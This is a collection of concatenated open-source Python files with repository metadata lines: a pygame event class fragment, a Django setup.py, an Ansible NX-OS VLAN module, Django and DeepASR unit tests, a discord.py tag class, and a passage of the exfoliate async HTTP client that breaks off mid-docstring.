                for key, value in event_dict.items():
                    setattr(self, key, value)
            for key, value in attributes.items():
                setattr(self, key, value)

        # Bizarre undocumented but used by some people.
        self.dict = self.__dict__

    def __repr__(self):
        d = copy(self.__dict__)
        del d['type']
        return '<Event(%d-%s %r)>' % \
               (self.type, event_name(self.type), d)

    def __nonzero__(self):
        # Only the NOEVENT placeholder is falsy.
        return self.type != SDL_NOEVENT

# Alias kept for pygame API compatibility.
EventType = Event
| gpl-3.0 |
gotlium/django-secure-auth | setup.py | 2 | 1737 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from secureauth import get_version
# Package metadata for django-secure-auth.
# NOTE: package_data previously relied on accidental implicit string
# concatenation -- a missing comma after the locale glob merged the .po and
# .js patterns into one bogus path, so neither set of files was packaged.
setup(
    name='django-secure-auth',
    version=get_version(),
    description='Secure authentication by TOTP, SMS, Codes & Question',
    keywords='django secure auth protection totp sms codes question',
    long_description=open('README.rst').read(),
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
    ],
    author="GoTLiuM InSPiRiT",
    author_email='gotlium@gmail.com',
    url='https://github.com/gotlium/django-secure-auth',
    license='GPL v3',
    packages=find_packages(exclude=['demo']),
    include_package_data=True,
    package_data={'secureauth': [
        'templates/secureauth/*.html',
        'templates/secureauth/codes_settings/*.html',
        'templates/secureauth/phone_settings/*.html',
        'templates/secureauth/question_settings/*.html',
        'templates/secureauth/totp_settings/*.html',
        'locale/*/LC_MESSAGES/*.po',  # bug fix: comma was missing here,
        'static/secureauth/js/*.js',  # silently concatenating both globs
    ]},
    zip_safe=False,
    install_requires=[
        'pyotp>=1.3.1',
        'httpagentparser>=1.5.0',
        'django-tables2>=0.14.0',
        'django-filter>=0.7',
        'phonenumbers>=6.1.0',
        'django-simple-captcha>=0.4.2',
        'django-ipware>=0.0.8',
        'slowaes==0.1a1',
        'ipaddress>=1.0.6',
        'django-phonenumber-field>=0.5',
    ]
)
| gpl-3.0 |
elventear/ansible | lib/ansible/modules/network/nxos/nxos_vlan.py | 4 | 13607 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: nxos_vlan
version_added: "2.1"
short_description: Manages VLAN resources and attributes.
description:
- Manages VLAN configurations on NX-OS switches.
author: Jason Edelman (@jedelman8)
options:
vlan_id:
description:
- Single VLAN ID.
required: false
default: null
vlan_range:
description:
- Range of VLANs such as 2-10 or 2,5,10-15, etc.
required: false
default: null
name:
description:
- Name of VLAN.
required: false
default: null
vlan_state:
description:
      - Manage the vlan operational state of the VLAN
        (equivalent to state {active | suspend} command).
required: false
default: active
choices: ['active','suspend']
admin_state:
description:
- Manage the VLAN administrative state of the VLAN equivalent
to shut/no shut in VLAN config mode.
required: false
default: up
choices: ['up','down']
mapped_vni:
description:
- The Virtual Network Identifier (VNI) ID that is mapped to the
VLAN. Valid values are integer and keyword 'default'.
required: false
default: null
version_added: "2.2"
state:
description:
- Manage the state of the resource.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: Ensure a range of VLANs are not present on the switch
nxos_vlan:
vlan_range: "2-10,20,50,55-60,100-150"
host: 68.170.147.165
username: cisco
password: cisco
state: absent
transport: nxapi
- name: Ensure VLAN 50 exists with the name WEB and is in the shutdown state
nxos_vlan:
vlan_id: 50
host: 68.170.147.165
admin_state: down
name: WEB
transport: nxapi
username: cisco
password: cisco
- name: Ensure VLAN is NOT on the device
nxos_vlan:
vlan_id: 50
host: 68.170.147.165
state: absent
transport: nxapi
username: cisco
password: cisco
'''
RETURN = '''
proposed_vlans_list:
description: list of VLANs being proposed
returned: always
type: list
sample: ["100"]
existing_vlans_list:
description: list of existing VLANs on the switch prior to making changes
returned: always
type: list
sample: ["1", "2", "3", "4", "5", "20"]
end_state_vlans_list:
description: list of VLANs after the module is executed
returned: always
type: list
sample: ["1", "2", "3", "4", "5", "20", "100"]
proposed:
description: k/v pairs of parameters passed into module (does not include
vlan_id or vlan_range)
returned: always
type: dict or null
sample: {"admin_state": "down", "name": "app_vlan",
"vlan_state": "suspend", "mapped_vni": "5000"}
existing:
description: k/v pairs of existing vlan or null when using vlan_range
returned: always
type: dict
sample: {"admin_state": "down", "name": "app_vlan",
"vlan_id": "20", "vlan_state": "suspend", "mapped_vni": ""}
end_state:
description: k/v pairs of the VLAN after executing module or null
when using vlan_range
returned: always
type: dict or null
sample: {"admin_state": "down", "name": "app_vlan", "vlan_id": "20",
"vlan_state": "suspend", "mapped_vni": "5000"}
updates:
description: command string sent to the device
returned: always
type: list
sample: ["vlan 20", "vlan 55", "vn-segment 5000"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
# Deduplicated import block: the nxos helper imports and AnsibleModule were
# previously repeated verbatim.  Same names, imported once, stdlib first.
import re

from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.nxos import (check_args, get_config, load_config,
                                       nxos_argument_spec, run_commands)
def vlan_range_to_list(vlans):
    """Expand a VLAN range string such as '2-10,20' into a numerically
    sorted list of VLAN ID strings.  Returns [] for empty input; a 'none'
    chunk terminates parsing.
    """
    if not vlans:
        return []
    expanded = []
    for chunk in vlans.split(','):
        if chunk == 'none':
            break
        if '-' in chunk:
            low, high = (int(edge) for edge in chunk.split('-'))
            expanded.extend(range(low, high + 1))
        else:
            expanded.append(int(chunk))
    return numerical_sort(expanded)
def numerical_sort(string_int_list):
    """Sort VLAN IDs (strings or ints that are digits) in numerical order.

    Arguments:
        string_int_list (iterable): VLAN IDs as strings and/or ints.

    Returns:
        list: the IDs sorted numerically, each rendered as a str.
    """
    # sorted() over the int values replaces the original two-pass
    # convert/sort/convert loops with a single expression.
    return [str(vlan) for vlan in sorted(int(vlan) for vlan in string_int_list)]
def build_commands(vlans, state):
    """Render one 'vlan N' (present) or 'no vlan N' (absent) command per
    VLAN ID; any other state yields no commands.
    """
    if state == 'present':
        template = 'vlan {0}'
    elif state == 'absent':
        template = 'no vlan {0}'
    else:
        return []
    return [template.format(vlan) for vlan in vlans]
def get_vlan_config_commands(vlan, vid):
    """Build command list required for VLAN configuration

    Arguments:
        vlan (dict): proposed attribute changes (keys among name, vlan_state,
            admin_state, mode, mapped_vni)
        vid (str): the VLAN ID being configured

    Returns:
        list: CLI commands wrapped in 'vlan <vid>' ... 'exit'
    """
    # admin_state arrives in module vocabulary (up/down); translate it back
    # to the device CLI vocabulary (no shutdown/shutdown)
    reverse_value_map = {
        "admin_state": {
            "down": "shutdown",
            "up": "no shutdown"
        }
    }

    if vlan.get('admin_state'):
        # apply value map when making change to the admin state
        # note: would need to be a loop or more in depth check if
        # value map has more than 1 key
        vlan = apply_value_map(reverse_value_map, vlan)

    # template for each supported attribute -> CLI command
    VLAN_ARGS = {
        'name': 'name {0}',
        'vlan_state': 'state {0}',
        'admin_state': '{0}',
        'mode': 'mode {0}',
        'mapped_vni': 'vn-segment {0}'
    }

    commands = []

    for param, value in vlan.items():
        if param == 'mapped_vni' and value == 'default':
            # 'default' keyword means: remove any existing VNI mapping
            command = 'no vn-segment'
        else:
            command = VLAN_ARGS.get(param).format(vlan.get(param))

        if command:
            commands.append(command)

    # enter VLAN config context first, leave it last
    commands.insert(0, 'vlan ' + vid)
    commands.append('exit')

    return commands
def get_list_of_vlans(module):
    """Return the list of VLAN IDs (as strings) currently on the switch."""
    body = run_commands(module, ['show vlan | json'])
    vlan_list = []
    vlan_table = body[0].get('TABLE_vlanbrief')['ROW_vlanbrief']

    if isinstance(vlan_table, list):
        for vlan in vlan_table:
            vlan_list.append(str(vlan['vlanshowbr-vlanid-utf']))
    else:
        # NOTE(review): when exactly one VLAN exists, NX-API returns a dict
        # instead of a list; this assumes that lone VLAN is the default
        # VLAN 1 rather than reading its actual ID -- verify on devices
        # where only a non-default VLAN exists.
        vlan_list.append('1')

    return vlan_list
def get_vni(vlanid, module):
    """Return the VNI (vn-segment) mapped to the given VLAN, or '' if none."""
    # fetch only the 'vlan <id>' section of the full running config
    flags = str('all | section vlan.{0}'.format(vlanid)).split(' ')
    body = get_config(module, flags=flags)
    #command = 'show run all | section vlan.{0}'.format(vlanid)
    #body = execute_show_command(command, module, command_type='cli_show_ascii')[0]
    value = ''
    if body:
        # capture everything after 'vn-segment ' on its line
        REGEX = re.compile(r'(?:vn-segment\s)(?P<value>.*)$', re.M)
        if 'vn-segment' in body:
            value = REGEX.search(body).group('value')
    return value
def get_vlan(vlanid, module):
    """Get instance of VLAN as a dictionary

    Returns an empty dict when the VLAN does not exist on the device.
    """
    command = 'show vlan id %s | json' % vlanid
    body = run_commands(module, [command])
    #command = 'show vlan id ' + vlanid
    #body = execute_show_command(command, module)

    try:
        vlan_table = body[0]['TABLE_vlanbriefid']['ROW_vlanbriefid']
    except (TypeError, IndexError):
        # device returned no structured data for this VLAN ID
        return {}

    # translate NX-API keys to this module's parameter names
    key_map = {
        "vlanshowbr-vlanid-utf": "vlan_id",
        "vlanshowbr-vlanname": "name",
        "vlanshowbr-vlanstate": "vlan_state",
        "vlanshowbr-shutstate": "admin_state"
    }

    vlan = apply_key_map(key_map, vlan_table)

    # normalize device admin-state strings to the module's up/down vocabulary
    value_map = {
        "admin_state": {
            "shutdown": "down",
            "noshutdown": "up"
        }
    }

    vlan = apply_value_map(value_map, vlan)
    vlan['mapped_vni'] = get_vni(vlanid, module)
    return vlan
def apply_key_map(key_map, table):
    """Return a new dict with table's keys renamed through key_map.

    Keys absent from key_map (or mapping to a falsy name) are dropped;
    every kept value is stringified.
    """
    return {
        key_map[key]: str(value)
        for key, value in table.items()
        if key_map.get(key)
    }
def apply_value_map(value_map, resource):
    """Translate selected resource values in place via value_map and return
    the (mutated) resource for convenience.
    """
    for field, translations in value_map.items():
        resource[field] = translations[resource.get(field)]
    return resource
def main():
    """Entry point: build the module spec, diff proposed against existing
    VLAN state, and push the resulting commands to the device.
    """
    argument_spec = dict(
        vlan_id=dict(required=False, type='str'),
        vlan_range=dict(required=False),
        name=dict(required=False),
        vlan_state=dict(choices=['active', 'suspend'], required=False),
        mapped_vni=dict(required=False, type='str'),
        state=dict(choices=['present', 'absent'], default='present',
                   required=False),
        admin_state=dict(choices=['up', 'down'], required=False),
        include_defaults=dict(default=False),
        config=dict(),
        save=dict(type='bool', default=False)
    )

    # bug fix: this update(), the warnings/check_args pair and the
    # results['warnings'] assignment below were each executed twice.
    argument_spec.update(nxos_argument_spec)

    module = AnsibleModule(argument_spec=argument_spec,
                           mutually_exclusive=[['vlan_range', 'name'],
                                               ['vlan_id', 'vlan_range']],
                           supports_check_mode=True)

    warnings = list()
    check_args(module, warnings)

    vlan_range = module.params['vlan_range']
    vlan_id = module.params['vlan_id']
    name = module.params['name']
    vlan_state = module.params['vlan_state']
    admin_state = module.params['admin_state']
    mapped_vni = module.params['mapped_vni']
    state = module.params['state']
    changed = False

    if vlan_id:
        if not vlan_id.isdigit():
            module.fail_json(msg='vlan_id must be a valid VLAN ID')

    args = dict(name=name, vlan_state=vlan_state,
                admin_state=admin_state, mapped_vni=mapped_vni)
    proposed = dict((k, v) for k, v in args.items() if v is not None)

    proposed_vlans_list = numerical_sort(vlan_range_to_list(
        vlan_id or vlan_range))
    existing_vlans_list = numerical_sort(get_list_of_vlans(module))
    commands = []
    existing = {}

    if vlan_range:
        if state == 'present':
            # VLANs that are proposed but do not yet exist on the switch
            vlans_delta = list(
                set(proposed_vlans_list).difference(existing_vlans_list))
            commands = build_commands(vlans_delta, state)

        elif state == 'absent':
            # VLANs present both in the proposal and on the switch
            vlans_common = list(
                set(proposed_vlans_list).intersection(existing_vlans_list))
            commands = build_commands(vlans_common, state)
    else:
        existing = get_vlan(vlan_id, module)
        if state == 'absent':
            if existing:
                commands = ['no vlan ' + vlan_id]
        elif state == 'present':
            # a VNI of '0' on the device already means "no mapping", so
            # proposing 'default' is a no-op
            if (existing.get('mapped_vni') == '0' and
                    proposed.get('mapped_vni') == 'default'):
                proposed.pop('mapped_vni')
            delta = dict(set(
                proposed.items()).difference(existing.items()))
            if delta or not existing:
                commands = get_vlan_config_commands(delta, vlan_id)

    end_state = existing
    end_state_vlans_list = existing_vlans_list

    if commands:
        # changing an existing VNI mapping requires removing the old one first
        if existing.get('mapped_vni') and state != 'absent':
            if (existing.get('mapped_vni') != proposed.get('mapped_vni') and
                    existing.get('mapped_vni') != '0' and proposed.get('mapped_vni') != 'default'):
                commands.insert(1, 'no vn-segment')
        if module.check_mode:
            module.exit_json(changed=True,
                             commands=commands)
        else:
            load_config(module, commands)
            changed = True
            end_state_vlans_list = numerical_sort(get_list_of_vlans(module))
            if 'configure' in commands:
                commands.pop(0)
            if vlan_id:
                end_state = get_vlan(vlan_id, module)

    results = {}
    results['proposed_vlans_list'] = proposed_vlans_list
    results['existing_vlans_list'] = existing_vlans_list
    results['proposed'] = proposed
    results['existing'] = existing
    results['end_state'] = end_state
    results['end_state_vlans_list'] = end_state_vlans_list
    results['updates'] = commands
    results['changed'] = changed
    results['warnings'] = warnings

    module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
incuna/django-orderable | orderable/tests/test_manager.py | 1 | 1893 | from django.test import TestCase
from .models import SubTask, Task
class TestOrderableManager(TestCase):
    """Verify after()/before() navigation on the default Task manager."""

    @classmethod
    def setUpTestData(cls):
        # three tasks with ascending sort_order: first, middle, last
        cls.first_task, cls.middle_task, cls.last_task = [
            Task.objects.create(sort_order=index) for index in range(3)
        ]

    def test_gets_next(self):
        self.assertEqual(Task.objects.after(self.first_task), self.middle_task)

    def test_gets_previous(self):
        self.assertEqual(Task.objects.before(self.last_task), self.middle_task)

    def test_returns_none_if_after_on_last(self):
        self.assertIsNone(Task.objects.after(self.last_task))

    def test_returns_none_if_previous_on_first(self):
        self.assertIsNone(Task.objects.before(self.first_task))
class TestOrderableRelatedManager(TestCase):
    """Verify after()/before() navigation through a related manager."""

    @classmethod
    def setUpTestData(cls):
        cls.task = Task.objects.create()
        # three subtasks of one parent, ascending sort_order
        cls.first_sub_task, cls.middle_sub_task, cls.last_sub_task = [
            SubTask.objects.create(task=cls.task, sort_order=index)
            for index in range(3)
        ]

    def test_gets_next(self):
        self.assertEqual(
            self.task.subtask_set.after(self.first_sub_task),
            self.middle_sub_task,
        )

    def test_gets_previous(self):
        self.assertEqual(
            self.task.subtask_set.before(self.last_sub_task),
            self.middle_sub_task,
        )

    def test_returns_none_if_after_on_last(self):
        self.assertIsNone(self.task.subtask_set.after(self.last_sub_task))

    def test_returns_none_if_previous_on_first(self):
        self.assertIsNone(self.task.subtask_set.before(self.first_sub_task))
| bsd-2-clause |
Rapptz/discord.py | discord/ext/commands/_types.py | 2 | 1265 | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
# This is merely a tag type to avoid circular import issues.
# Yes, this is a terrible solution but ultimately it is the only solution.
class _BaseCommand:
    """Marker base class for command objects.

    Exists only so other modules can isinstance()-check commands without
    importing the real Command class (which would create an import cycle).
    Empty __slots__ keeps instances stateless at this level.
    """

    __slots__ = ()
| mit |
lcy-seso/models | fluid/DeepASR/data_utils/augmentor/tests/test_data_trans.py | 4 | 4878 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import unittest
import numpy as np
import data_utils.augmentor.trans_mean_variance_norm as trans_mean_variance_norm
import data_utils.augmentor.trans_add_delta as trans_add_delta
import data_utils.augmentor.trans_splice as trans_splice
import data_utils.augmentor.trans_delay as trans_delay
class TestTransMeanVarianceNorm(unittest.TestCase):
    """unit test for TransMeanVarianceNorm
    """

    def setUp(self):
        # fixture file holding pre-computed global mean/variance statistics
        self._file_path = "./data_utils/augmentor/tests/data/" \
                          "global_mean_var_search26kHr"

    def test(self):
        # two frames of 120-dim features, all ones
        feature = np.zeros((2, 120), dtype="float32")
        feature.fill(1)
        trans = trans_mean_variance_norm.TransMeanVarianceNorm(self._file_path)
        (feature1, label1, name) = trans.perform_trans((feature, None, None))
        (mean, var) = trans.get_mean_var()
        feature_flat1 = feature1.flatten()
        feature_flat = feature.flatten()
        one = np.ones((1), dtype="float32")
        # each of the 120 dimensions must be normalized per-dimension as
        # (x - mean[d]) * var[d], repeating every 120 values in the flat view
        for idx, val in enumerate(feature_flat1):
            cur_idx = idx % 120
            self.assertAlmostEqual(val, (one[0] - mean[cur_idx]) * var[cur_idx])
class TestTransAddDelta(unittest.TestCase):
    """unit test TestTransAddDelta
    """

    def test_regress(self):
        """test regress
        """
        # 14 frames x 120 dims; frames 5..8 carry the ramp 1,2,3,4 in the
        # first 40 dims, surrounded by replicated edge-value context frames
        feature = np.zeros((14, 120), dtype="float32")
        feature[0:5, 0:40].fill(1)
        feature[0 + 5, 0:40].fill(1)
        feature[1 + 5, 0:40].fill(2)
        feature[2 + 5, 0:40].fill(3)
        feature[3 + 5, 0:40].fill(4)
        feature[8:14, 0:40].fill(4)
        trans = trans_add_delta.TransAddDelta()
        feature = feature.reshape((14 * 120))
        # first _regress writes first-order deltas into dims 40-79, second
        # writes deltas-of-deltas into dims 80-119 (presumably a standard
        # regression-window delta -- TODO confirm against TransAddDelta)
        trans._regress(feature, 5 * 120, feature, 5 * 120 + 40, 40, 4, 120)
        trans._regress(feature, 5 * 120 + 40, feature, 5 * 120 + 80, 40, 4, 120)
        feature = feature.reshape((14, 120))
        tmp_feature = feature[5:5 + 4, :]
        # static dims unchanged (col 0); delta dims checked at col 119
        self.assertAlmostEqual(1.0, tmp_feature[0][0])
        self.assertAlmostEqual(0.24, tmp_feature[0][119])
        self.assertAlmostEqual(2.0, tmp_feature[1][0])
        self.assertAlmostEqual(0.13, tmp_feature[1][119])
        self.assertAlmostEqual(3.0, tmp_feature[2][0])
        self.assertAlmostEqual(-0.13, tmp_feature[2][119])
        self.assertAlmostEqual(4.0, tmp_feature[3][0])
        self.assertAlmostEqual(-0.24, tmp_feature[3][119])

    def test_perform(self):
        """test perform
        """
        # four 40-dim frames valued 1..4; perform_trans should widen each
        # frame to 120 dims (static + delta + delta-delta)
        feature = np.zeros((4, 40), dtype="float32")
        feature[0, 0:40].fill(1)
        feature[1, 0:40].fill(2)
        feature[2, 0:40].fill(3)
        feature[3, 0:40].fill(4)
        trans = trans_add_delta.TransAddDelta()
        (feature, label, name) = trans.perform_trans((feature, None, None))
        self.assertAlmostEqual(feature.shape[0], 4)
        self.assertAlmostEqual(feature.shape[1], 120)
        self.assertAlmostEqual(1.0, feature[0][0])
        self.assertAlmostEqual(0.24, feature[0][119])
        self.assertAlmostEqual(2.0, feature[1][0])
        self.assertAlmostEqual(0.13, feature[1][119])
        self.assertAlmostEqual(3.0, feature[2][0])
        self.assertAlmostEqual(-0.13, feature[2][119])
        self.assertAlmostEqual(4.0, feature[3][0])
        self.assertAlmostEqual(-0.24, feature[3][119])
class TestTransSplict(unittest.TestCase):
    """unit test Test TransSplict

    NOTE(review): the class and method names contain typos ('Splict',
    'perfrom'); left unchanged because unittest discovers tests by name.
    """

    def test_perfrom(self):
        # 8 frames of 10 dims, frame i filled with value i
        feature = np.zeros((8, 10), dtype="float32")
        for i in xrange(feature.shape[0]):
            feature[i, :].fill(i)

        trans = trans_splice.TransSplice()
        (feature, label, name) = trans.perform_trans((feature, None, None))
        # 110 = 11 frames x 10 dims: each output frame concatenates the
        # current frame with 5 frames of left and 5 of right context,
        # replicating the edge frames at the boundaries
        self.assertEqual(feature.shape[1], 110)

        for i in xrange(8):
            nzero_num = 5 - i      # how many leading slots repeat frame 0
            cur_val = 0.0
            if nzero_num < 0:
                cur_val = i - 5 - 1
            for j in xrange(11):
                if j <= nzero_num:
                    for k in xrange(10):
                        self.assertAlmostEqual(feature[i][j * 10 + k], cur_val)
                else:
                    # advance through frames 1..7, clamping at the last frame
                    if cur_val < 7:
                        cur_val += 1.0
                    for k in xrange(10):
                        self.assertAlmostEqual(feature[i][j * 10 + k], cur_val)
class TestTransDelay(unittest.TestCase):
    """unittest TransDelay
    """

    def test_perform(self):
        # labels 0..9, one per frame
        label = np.zeros((10, 1), dtype="int64")
        for i in xrange(10):
            label[i][0] = i

        trans = trans_delay.TransDelay(5)
        (_, label, _) = trans.perform_trans((None, label, None))

        # labels are shifted right by the 5-frame delay ...
        for i in xrange(5):
            self.assertAlmostEqual(label[i + 5][0], i)
        # ... and the first 5 frames are zero-filled
        for i in xrange(5):
            self.assertAlmostEqual(label[i][0], 0)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
brianjpetersen/exfoliate | exfoliate/exfoliate.py | 1 | 12796 | """Exfoliate is the asynchronous HTTP client for developers who prefer synchronous Python.
Enjoy the benefits of a scalable, asynchronous HTTP client without worrying about coroutines or
event loops. Exfoliate is the gentler, more Pythonic way to scrape the web.
"""
import asyncio
import aiohttp
import threading
import types
import concurrent.futures
import atexit
import json
import collections
import time
import chardet
# expose relevant aiohttp classes here
TCPConnector = aiohttp.TCPConnector
CookieJar = aiohttp.CookieJar
DummyCookieJar = aiohttp.DummyCookieJar
class Futures(collections.abc.Collection):
    """ A container object that supports iterating over futures as they complete.

    The two main differences between this class and concurrent.futures.as_completed are:

    * concurrent.futures.as_completed works on any iterable containing futures, whereas Futures
      is a tailored container object
    * the Futures class reflects futures added to it during iteration

    The latter of these differences is important to make exfoliate easier to use during web
    scraping.

    Note that this class is currently not thread-safe due to the duplicated data in _pending_set
    and _pending_deque, which considered in combination are not updated atomically resulting in
    potential race conditions.
    """

    def __init__(self, futures=None):
        # completed futures live only in _complete_set; pending futures are
        # tracked in both a set (O(1) membership tests) and a deque (cheap
        # round-robin polling order)
        self._complete_set = set()
        self._pending_set = set()
        self._pending_deque = collections.deque()
        if futures is not None:
            for future in futures:
                self.add(future)

    @property
    def completed(self):
        """The set of futures that have resolved."""
        return self._complete_set

    @property
    def pending(self):
        """The set of futures that have not yet resolved."""
        return self._pending_set

    def add(self, future):
        """Track a future, routing it by completion state (duplicates ignored)."""
        if future.done():
            self._complete_set.add(future)
        elif future not in self._pending_set:
            self._pending_set.add(future)
            self._pending_deque.append(future)

    def remove(self, future):
        """Stop tracking a future; raise KeyError if it is not tracked."""
        if future in self._pending_set:
            self._pending_set.remove(future)
            self._pending_deque.remove(future)
        elif future in self._complete_set:
            self._complete_set.remove(future)
        else:
            raise KeyError(f'Futures object does not contain {future}')

    def __contains__(self, future):
        return (future in self._complete_set) or (future in self._pending_deque)

    def __iter__(self):
        # Bug fix: iterate a snapshot of the completed set.  This class
        # explicitly supports add()/remove() during iteration, and mutating
        # a set while iterating it directly raises RuntimeError.
        for future in tuple(self._complete_set):
            yield future
        while len(self._pending_deque):
            future = self._pending_deque[-1]
            if future.done():
                self._pending_set.remove(future)
                self._pending_deque.pop()
                self._complete_set.add(future)
                yield future
            else:
                # not done yet: rotate it to the back and sleep briefly so we
                # poll the pending futures round-robin without busy-waiting
                self._pending_deque.rotate(1)
                time.sleep(0.1)

    def __len__(self):
        return len(self._complete_set) + len(self._pending_set)

    def __repr__(self):
        return 'Futures(({}))'.format(
            ', '.join(repr(future) for future in self._complete_set.union(self._pending_set))
        )
class RequestException(IOError):
    """ An ambiguous exception in completing a Request meant for subclassing.

    The originating Response (if any) is attached as ``.response`` via the
    ``response=`` keyword argument; all other arguments pass through to
    IOError unchanged.
    """

    def __init__(self, *args, **kwargs):
        # pop() so positional args reach IOError untouched
        self.response = kwargs.pop('response', None)
        # modernized: zero-argument super() (file already requires 3.6+
        # for f-strings)
        super().__init__(*args, **kwargs)
class HTTPError(RequestException):
    """An HTTP error occurred; the triggering Response is available as .response."""
class Response:
    """ A thin wrapper over aiohttp.ClientResponse to allow interaction with the response outside
    the event loop.

    Attributes:
        url (str): URL of request
        method (str): method of request, eg 'get'
        version (aiohttp.HttpVersion): HTTP version of response
        status_code (int): HTTP status code of response, eg 200
        headers (multidict.CIMultiDictProxy): case-insensitive multidict representing the HTTP
            headers of the response
        cookies (http.cookies.SimpleCookie): HTTP cookies of response
        history (tuple): Response instances of preceding requests (earliest request first) if there
            were redirects, an empty tuple otherwise
        content (bytes): HTTP body of response (also available as ``body``)
    """

    def __init__(self, url, method, version, status_code, headers, cookies, history, body):
        self.url = url
        self.method = method
        self.version = version
        self.status_code = status_code
        self.headers = headers
        self.history = history
        self.cookies = cookies
        # aliased: some callers prefer requests-style `content`
        self.body = self.content = body

    def raise_for_status(self):
        """Raise HTTPError if the status code indicates a 4xx or 5xx error."""
        if 400 <= self.status_code < 500:
            # bug fix: 4xx is a *client* error; the message previously said
            # "Server Error" for both ranges
            http_error_message = f'{self.status_code} Client Error for url: {self.url}'
        elif 500 <= self.status_code < 600:
            http_error_message = f'{self.status_code} Server Error for url: {self.url}'
        else:
            http_error_message = None
        if http_error_message is not None:
            raise HTTPError(http_error_message, response=self)

    def json(self):
        """Deserialize the response body as JSON."""
        return json.loads(self.body)

    def text(self, encoding=None, errors='strict'):
        """Decode the response body to str, sniffing the encoding if not given."""
        if encoding is None:
            encoding = self._get_encoding()
        return self.body.decode(encoding, errors=errors)

    def _get_encoding(self):
        # prefer the charset declared in Content-Type, then RFC 7159's UTF-8
        # default for JSON, then chardet detection, then UTF-8 as last resort
        ctype = self.headers.get(aiohttp.helpers.hdrs.CONTENT_TYPE, '').lower()
        mtype, stype, _, params = aiohttp.helpers.parse_mimetype(ctype)
        encoding = params.get('charset')
        if not encoding:
            if mtype == 'application' and stype == 'json':
                # RFC 7159 states that the default encoding is UTF-8.
                encoding = 'utf-8'
            else:
                encoding = chardet.detect(self.body)['encoding']
        if not encoding:
            encoding = 'utf-8'
        return encoding

    def __repr__(self):
        return '<Response [{}]>'.format(self.status_code)
async def _arequest(method_name, event_loop, connector, cookie_jar, *args, **kwargs):
    """The workhorse async request aiohttp machinery underlying the synchronous Client.

    Arguments:
        method_name (str): the lowercase HTTP verb (eg, get or post) for the request
        event_loop (asyncio.AbstractEventLoop): the event loop used for aiohttp
        connector (aiohttp.TCPConnector): a connection pool to be shared by requests; this is managed
            external to the session (see connector_owner=False)
        cookie_jar (aiohttp.AbstractCookieJar): the cookie jar to be used for the request
        *args: positional arguments to pass to aiohttp.method request
        **kwargs: keyword arguments to pass to aiohttp.method request

    Returns:
        response (Response): the HTTP response

    A session is created per request to ensure cookie isolation on a per request basis by default.
    This is necessary for correct handling of cookies for requests resulting in redirects. The
    recommended aiohttp solution for this problem is using aiohttp.helpers.DummyCookieJar, but this
    doesn't correctly handle cookies for requests resulting in redirects; see
    https://github.com/aio-libs/aiohttp/issues/2067 for more details.
    """
    # connector_owner=False: closing this throwaway session must not close
    # the shared connection pool owned by the Client
    session = aiohttp.ClientSession(
        loop=event_loop,
        connector=connector,
        cookie_jar=cookie_jar,
        connector_owner=False,
    )
    async with session:
        # e.g. session.get / session.post, resolved from the verb name
        method = getattr(session, method_name.lower())
        async with method(*args, **kwargs) as response:
            # materialize each redirect hop into a plain Response so callers
            # can inspect the chain outside the event loop
            history = []
            for redirect in response.history:
                body = await redirect.read()
                history.append(
                    Response(
                        redirect.url,
                        redirect.method,
                        redirect.version,
                        redirect.status,
                        redirect.headers,
                        redirect.cookies,
                        (),
                        body,
                    )
                )
            # read the body eagerly while the connection is still open
            body = await response.read()
            return Response(
                response.url,
                response.method,
                response.version,
                response.status,
                response.headers,
                response.cookies,
                tuple(history),
                body,
            )
class Client:
    """An asynchronous HTTP client that lets you remain ignorant of coroutines, event loops, etc.

    Example:
        >>> client = Client()
        >>> client.get('https://httpbin.org') # doesn't block!
        >>> future = client.get(
        ...     'https://httpbin.org/headers',
        ...     headers={'testing': 'exfoliate'},
        ... ) # returns a future!
        >>> for future in client.futures: # iterate over the futures as they resolve!
        ...     response = future.result()
        ...     print(response)
        <Response [200]>
        <Response [200]>

    Arguments:
        connections (int): number of connections to use for connection pooling in the event a
            connector is not supplied and one needs to be instantiated
        cookie_jar (aiohttp.AbstractCookieJar or None): the cookie jar to be used for all requests
            made through this client; if None, use a separate cookie jar for each request
        connector (aiohttp.TCPConnector): a connection pool to be shared by requests

    There are several known bugs affecting requests through aiohttp with proxies:

    * https://github.com/aio-libs/aiohttp/issues/1340
